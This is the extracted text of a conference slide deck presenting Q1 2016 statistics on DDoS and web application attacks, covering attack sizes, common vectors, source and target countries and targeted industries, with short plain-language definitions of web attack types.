Post on 01-Apr-2021
www.cloudsec.com/tw | #CLOUDSEC
DDoS attack patterns across the
APJ cloud market
Samuel Chen CCIE#9607 Enterprise Security
Architect, Manager - APJ
#CLOUDSEC
DDoS attacks from Q1 2014 to Q1 2016
• Each dot represents an individual DDoS attack, and each interval covers a 10-fold increase in attack size. The boxes mark the interquartile range – the middle 50% of attacks.
#CLOUDSEC
DDoS Attack Median Packet Rate and IQR
While there were six DDoS attacks in Q1 that exceeded 30 Mpps, more than half of the attacks measured 1 Mpps or less.
The graph shows the packet rate for the middle 50% of DDoS attacks from Q1 2014 –Q1 2016
#CLOUDSEC
Compared to Q1 2015
• 125% Total DDoS attacks
• 142% Infrastructure layer attacks
• 35% Average attack duration
• 138% Total attacks > 100 Gbps
In Q1 2016, repeat DDoS attacks remained the norm, with an average of 29 attacks per targeted customer. One target suffered 283 attacks – an average of three times per day for the quarter.
#CLOUDSEC
Compared to Q4 2015
• 23% Total DDoS attacks
• 107% Repeat attacks per target
• 23% Infrastructure layer attacks
• 8% Average attack duration
• 280% Total attacks >100 Gbps
Largest attack: 289 Gbps
Most packets per second: 67 Mpps
In Q1 2016, stresser/booter-based botnets remained the source of the vast majority of DDoS attacks observed by Akamai. These tools rely heavily upon reflection techniques to fuel their traffic.
#CLOUDSEC
Types of DDoS Attacks &
Relative Distribution in Q1 2016
UDP Fragment, DNS, NTP and CHARGEN attack vectors made up almost 70% of the attacks.
Avoid data theft and downtime by extending the
security perimeter outside the data-center and
protect from increasing frequency, scale and sophistication of web attacks.
10 Most Frequent Attack Vectors
by Quarter TCP Anomaly attacks remain in the top 10 vectors, which first edged out ICMP attacks in Q4 2015.
Avoid data theft and downtime by extending the
security perimeter outside the data-center and
protect from increasing frequency, scale and sophistication of web attacks.
Multi-Vector DDoS Attacks Are the Norm
Multi-vector attacks accounted for 59% of DDoS activity in Q1 2016, up from 56% in Q4 2015
Avoid data theft and downtime by extending the
security perimeter outside the data-center and
protect from increasing frequency, scale and sophistication of web attacks.
Reflection-Based DDoS Attacks,
Q1 2015-Q1 2016
SSDP, NTP, DNS, and CHARGEN have consistently been used as themost common reflection attack vectors, as shown on the left axis. The use of reflectionattacks has increased dramatically since Q1 2015, as shown on the right axis.
Avoid data theft and downtime by extending the
security perimeter outside the data-center and
protect from increasing frequency, scale and sophistication of web attacks.
DDoS Attack Frequency by Industry
Avoid data theft and downtime by extending the
security perimeter outside the data-center and
protect from increasing frequency, scale and sophistication of web attacks.
Average Number of DDoS Attacks
per Target
In Q1 2016 there were anaverage of 29 DDoS attacks per target, up from 24 last quarter. One target was hit with 283 attacks – averaging more than 3 attacks per day.
Avoid data theft and downtime by extending the
security perimeter outside the data-center and
protect from increasing frequency, scale and sophistication of web attacks.
Top 10 Source Countries for DDoS
Attacks in Q1 2016
China was the top source of non-spoofed DDoS attacks in the first quarter, followed by the US.
Avoid data theft and downtime by extending the
security perimeter outside the data-center and
protect from increasing frequency, scale and sophistication of web attacks.
Top 5 Source Countries for DDoS
Attacks, Q1 2015 – Q1 2016
China has been the top source country for DDoS attacks since Q1 2015, with the exception of Q3 2015, when the UK took the top spot.
Avoid data theft and downtime by extending the
security perimeter outside the data-center and
protect from increasing frequency, scale and sophistication of web attacks.
Mega Attacks > 100 Gbps in Q1 2016
Nineteen attacks exceeded 100
Gbps in Q1 2016, with the largest
hitting the software and technology,
gaming and media-entertainment
sectors.
Avoid data theft and downtime by extending the
security perimeter outside the data-center and
protect from increasing frequency, scale and sophistication of web attacks.
Mega Attacks > 30 Mpps in Q1 2016
Of the six attacks exceeding 30 Mpps in Q1 2016, the four largest targeted the software and technology sector.
Avoid data theft and downtime by extending the
security perimeter outside the data-center and
protect from increasing frequency, scale and sophistication of web attacks.
Spotlight:
Attack traffic distribution within scrubbing center locations, highlighted with Frankfurt absorbing the highest peak bandwidth of 104 Gbps.
Web Application Attack Analysis
9 Common Web Attack Vectors
• SQLi / SQL injection: User content is passed to an SQL statement without proper validation
• LFI / Local file inclusion: Gains unauthorized read access to local files on the web server
• RFI / Remote file inclusion: Abuse of the dynamic file include mechanism available in many programming languages to load remote malicious code into the victim web application
• PHPi / PHP injection: Injects PHP code that gets executed by the PHP interpreter
• CMDi / Command injection: Executes arbitrary shell commands on the target system
• JAVAi / Java injection: Abuses the Object Graph Navigation Language (OGNL), a Java expression language. Popular due to recent flaws in the Java-based Struts Framework, which uses OGNL extensively
• MFU / Malicious file upload (or unrestricted file
upload): Uploads unauthorized files to the
target application that may be used later to
gain full control over the system
• XSS / Cross-site scripting: Injects client-side
• code into web pages viewed by others whose
browsers execute the code within the security
context (or zone) of the hosting web site.
Reads, modifies and/or transmits data
accessible by the browser
• Shellshock / Disclosed in September 2014: A
• vulnerability in the Bash shell (the default shell
for Linux and mac OS X) that allows for
arbitrary command execution by a remote
attacker
#CLOUDSEC
Web Application Attack Vectors Over
HTTP, Q1 2016SQLi, LFI and XSS
were the most
prevalent attack
vectors. They were
used in more than
90% of the attacks
over HTTP.
#CLOUDSEC
Attacks Over HTTPS, Q1 2016
30% of the web applicationattacks observed in Q1 2016 were over encrypted (HTTPS) connections, an increase from only 11% the previous quarter.
#CLOUDSEC
Top 10 Source Countries for Web Application Attacks, Q1 2016
#CLOUDSEC
US-hosted web sites were targeted six times more often than the secondmost popular target country, Brazil.
Top 10 Target Countries for Web Application Attacks, Q1 2016
#CLOUDSEC
Web Application Attacks by Industry,
Q1 2016
As in previous quarters, the retail industry was most frequently targeted with web application attacks in Q1 2016.
#CLOUDSEC
Web Application Attack Triggers
by Industry, Q1 2016
94% of the attack triggers for web application attacks in Q1 2016 targeted just eight industries (shown in black).
#CLOUDSEC
SQLi and LFI Attack Triggers
by Target Industry, Q1 2016
#CLOUDSEC
Shellshock, XSS, and MFU Attack
Triggers by Industry
#CLOUDSEC
CMDI, PHPI, and RFI Attack Triggers
by Industry
#CLOUDSEC
24 Hour Bot Traffic Snapshot
Akamai Intelligent Platform™ Firewall Activity
#CLOUDSEC
Reflector Activity
• The location of leveraged Internet devices used in reflection-based DDoS
• attacks during Q1 2016 was concentrated in the US, Asia, and Europe.
#CLOUDSEC
Top 10 Reflection Sources by ASN
#CLOUDSEC
DDoS Reflection Sources
Cloud Security Resources
#CLOUDSEC
Q1 2016 Cloud Security Resources
• Scraper and Bot Series — When Good Bots Go Bad
• #OpKillingBay Expands Attacks
• BillGates Malware Used in DDoS Attacks
• Akamai Responds to Forwarding-Loop Issue
• IKE/IKEv2 Ripe for DDoS Abuse
• Akamai and the Glibc Vulnerability (CVE-2015-7547)
• Akamai and the DROWN Vulnerability
• DNSSEC Targeted in DNS Reflection, Amplification DDoS Attacks
• Akamai Customers Not Vulnerable to SLOTH
• How Web Applications Become SEO Pawns
Samuel Chen
CCIE#9607
Enterprise Security
Architect, Manager -
APJ